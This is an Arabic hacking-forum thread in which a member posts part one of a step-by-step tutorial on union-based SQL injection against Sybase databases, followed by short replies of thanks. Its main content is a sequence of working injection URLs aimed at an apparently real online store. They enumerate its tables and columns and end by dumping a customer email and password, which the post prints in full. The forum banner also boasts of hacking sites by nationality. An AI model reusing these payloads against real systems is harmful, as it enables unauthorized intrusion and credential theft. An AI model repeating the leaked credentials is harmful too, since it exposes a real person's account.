1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] الجزء الاول : حقن قواعد Sybase عن طريق Union Based

الموضوع في '[ SQL-injection ]' بواسطة Mohmad, بتاريخ ‏2 فبراير 2014.

كاتب الموضوع : Mohmad المشاهدات : 689 الردود : 9 ‏2 فبراير 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Mohmad
    rank
    Developer

    عضو منذ:
    ‏29 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    الصلاة و السلام على أشرف المرسليـن

    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا

    من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا

    و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم

    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين

    اليوم سوف اقوم بشرح حقن قواعد Sybase

    ان شاء الله

    في البداية قم بقرائه بسيطه حولها

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    سأقوم بشرح طريقتين للحقن فيما يخص هذا النوع من القاعدة السايبيز
    سنتطرق الى جزئين

    الجزء الاول : حقن قواعد Sybase عن طريق Union Based .
    و
    الجزء الثاني : حقن قواعد Sybase عن طريق Error Based .

    الآن نتطرق الى الجزء الأول
    نبدأ على البركة

    لاحظ عدنا موقع التالي

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226
    نقوم بالطريقه الاعتياديه بوضح اشارة سنكل كويت وهي '
    لاحظ الخاطأ الذي ضهر

    من خلال الأستعلام الخطأ الضاهر تبين لنا بان القاعده نوعها sybase
    لاحظ الي بالمستطيل الأحمر
    الآن أصبح لدينا يقين بأن القاعدة من نوع sybase

    الآن نأتي نحقن بالطريقة الاعتيادية
    ونقوم باستخراج عدد الاعمده

    باستخدام الامر order by
    نجرب هالأستعلام لآحظ على الموقع

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%201--
    لا يوجد حظ )2:"

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%2010--
    ضهر الخطأ
    كما نلاحظ في الصورة الآتية

    لاحظ هنا الخطأ
    يقولك هنا العدد او الرقم خارج الحلقه التابعة للجدول يعني مابي
    طيب نقلل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%207-- 
    ظهر الخطأ ونفس الرسالة 
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%205--
    ظهر الخطأ وبنفس الرسالة
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%203-- 
    لا يوجد خطأ
    هنا تبين لنا ان عدد الاعمدة هي 3

    طيب الان نأتي الى اضهار الاعمده المصابة
    باستخدام الأستعلام التالي

    كود PHP:
    union select num,num,etc...--
    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20union%20select%201,2,3--

    لاحظ الصورة الي في الأعلى ظهور خطأ غريب
    طيب تعال إنفسر هالخطأ
    هنا القاعدة تخاطبنة وتقول إن نوع البيانات من النوع VARCHAR
    الي تكون بداخل القاعده
    وانت تقوم بإدخال بيانات من نوع int
    فالاخير يقول استخدم دالة تحولك من نصي إلى رقمي
    مع العلم إن

    VARCHAR = قيمه نصيه قصيره لا تتجاوز 255 حرف
    int (intger) i = تعني قيه رقميه

    طيب هنا في طريقتين بدون استخدام دوال التحويل والا أي شي مثل ما قالت القاعدة

    الطريقه الاولى هوه استبدال مكان الاعمده الرقميه بقيمه فارغه والتي هي
    null = وهذه تعتبر قيمة نصية وتعبر بقيمه فارغة ...
    اما الثانيه هي نقوم بوضع الارقام بين علامتي تنصيص ''

    لأن عدنا قاعدة في php
    انو اذا كان الرقم يكتب مابين علامتي تنصيص يعتبر نصي وليس رقمي اذا كنت تريده رقمي تكتب الرقم مباشر .

    وانا افضل الطريقه الثانيه لأن الطريقة الثانية نستطيع تحديد عدد الاعمده بها بشكل واضح وتضهر لدينا الاعمده المصابه بالصفحه
    اما ألاولى نقوم بتخمين على مكان العمود المصاب لذلك افضل الثانية

    طيب
    نلاحظ كيف

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20%271%27,%272%27,null--

    [​IMG]


    نلاحظ هنا ظهور العمود 1 و 2 مما يدل على انها مصابة .
    طيب
    لو استبدلنا القيمه النصيه الي هيه null الموجودة بالعمود الثالث
    برقم بين علامتي تنصيص سيظهر الخطأ مما يدل على ان العمود الثالث غير مصاب
    اترك التجربه لك

    الان عرفنا الاعمده المصابه نكمل الحقنة
    نقوم بأستخراج اصدار القاعدة بالامر @@version
    لاحظ

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20@@version,%272%27,null--


    كما نلاحظ في الصوره اصدار القاعده
    الان نستخرج الجداول الموجودة داخل القاعدة لسايبير
    باستخدام union select

    ونضع مكان العمود المصاب **** = يعني اسم الجدول الاول
    مع الحاق آخر الحقنة بــ from+sysobjects = من نواة قاعدة السايبيز

    لتصبح الحقنة بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null+from+sysobjects--
    [​IMG]

    لاحظ ضهور اول جدول في القاعده وهو
    ec_employeetype
    طيب الان نقوم باستخراج الجداول البقيه الي يهمنا جدول اليوزر طيب لاحظ كيف

    هنا راح نستخدم استعلام بسيط وهو

    كود PHP:
    where ****!='table ****'  يعني اجلبلي اسم الجدول الي بعدة عدى الجدول الفلاني الي وضعنا بين علامتي تنصيص
    لاحظ كيف تصبح الحقنه

    كود PHP:
    store.organicgrown.com/index.php?action=product&id=-226  union select  ****,'2',null+from+sysobjects+where+****!='ec_employeetype' and  ****!='ec_giftcards' and ****!='ec_itemcategories' and  ****!='ec_optionlist' and ****!='ec_productoptions' and  ****!='ec_products' and ****!='ec_transactionlines' and  ****!='ec_transactions' and ****!='ec_trnslog' --
    [​IMG]

    هنا ظهر لنا جدول اليوزر الي هو ec_users

    طيب نكمل الحقنه باستخراج اعمدة الجدول تبع اليوزر
    عملية استخراج الاعمده نفس عملية استخراج اسماء الجداول
    مع مراعاة تغير الازم لاحظ

    نضع مكان العمود المصاب ****
    ونقوم بالحاق اخر الحقنه بالاستعلام الآتي

    كود PHP:
    from syscolumns where id=(select id from sysobjects where ****='table ****')
    كود PHP:
    id هنا يقصد به ترتيب الجداول الي مرقمة في القاعدة 
    from syscolumns where 
    =  من اعمدة نواة القاعدة السيبايس 
    select id from sysobjects where 
    ****='table ****' = (اختيار الترتيب من  نواة قاعده السيبايس اينما وجدت الجدول (ونقصد بالجدول المقصود ولنفرض جدول  اليوزر
    لتصبح الحقنة بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20****=%27ec_users%27%29--
    [​IMG]

    كما نلاحظ استخراج اول عمود للجدول اليوزر كما في الصوره التي في الاعلى
    ولاستخراج بقية الاعمدة نستخدم الاستعلام

    كود PHP:
    and ****!='column **** '      
    نكمل عالسريع الحقنه بعد الوصول الى الاعمده المطلوبه
    لاحظ الحقنه

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20****=%27ec_users%27%29%20and%20****!=%27rowid%27%20and%20****!=%27usertype%27%20and%20****!=%27first****%27%20and%20****!=%27last****%27%20and%20****!=%27company****%27%20and%20****!=%27phone%27%20and%20****!=%27fax%27%20and%20****!=%27email%27%20and%20****!=%27address%27%20and%20****!=%27city%27%20and%20****!=%27state%27%20and%20****!=%27zip%27%20and%20****!=%27country%27%20and%20****!=%27password%27--
    الان نقوم با ستخراج بيانات الاعمدة
    بوضع العمود المستخرج مكان العمود المصاب وبالحاق اخر الحقنه بجدول اليوزر يعني تكون الحقنه بالشكل النهائي هكذا

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20email,password,null%20from%20ec_users--
    [​IMG]

    وكما تلاحظ بالصور الاميل والباسورد لجدول اليوزر
    naddison@organicgrown.com = الأميل
    Hsd3z76 = بسوورد
    الى هنا انتهى الجزء الاول من الموضوع اسف ادري طولت

    انتضرونا في الجزء الثاني :{y.}

     


    جاري تحميل الصفحة...
  2. غير متصل

    خَـلـوٍوٍدٍي
    Active DeveloPer

    عضو منذ:
    ‏10 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    يعطيك الف عافية يا غالى

    واصل يا مبدع *:"
     


  3. غير متصل

    D 1 r k
    DeveloPer Plus

    عضو منذ:
    ‏9 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Currently Student
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور وما قصرت ً#ٌ5oًًًُ.
     


  4. غير متصل

    Тĥẻ GỌ∂FДТн€Ř
    DeveloPer Plus

    عضو منذ:
    ‏15 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور يا غالي على المجهود الكبير ..

    الله يعطيك العافيه
     


  5. غير متصل

    ! ـآوتآر !
    DeveloPer Plus

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    موضوع اكثر من رائع واصل بدون فواصل ً#ٌ5oًًًُ.
     


  6. غير متصل

    VeRoS_Dz
    rank
    Developer

    عضو منذ:
    ‏10 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    VeRoS_Dz
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور على الطرح يا غالي
    لا تحرمنا من جديدك يا بطل
     


  7. غير متصل

    Ahmed Alqurashi
    rank
    Developer

    عضو منذ:
    ‏14 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور أخي عل جهودك . ^:"
     


  8. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    يعطيك الف عافية ...
     


  9. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    )5:")5:")5:")5:")5:"
     


  10. غير متصل

    ÐβĽŎM
    rankrank
    Developer

    عضو منذ:
    ‏7 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مبدع اخي

    واصل ابداعك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...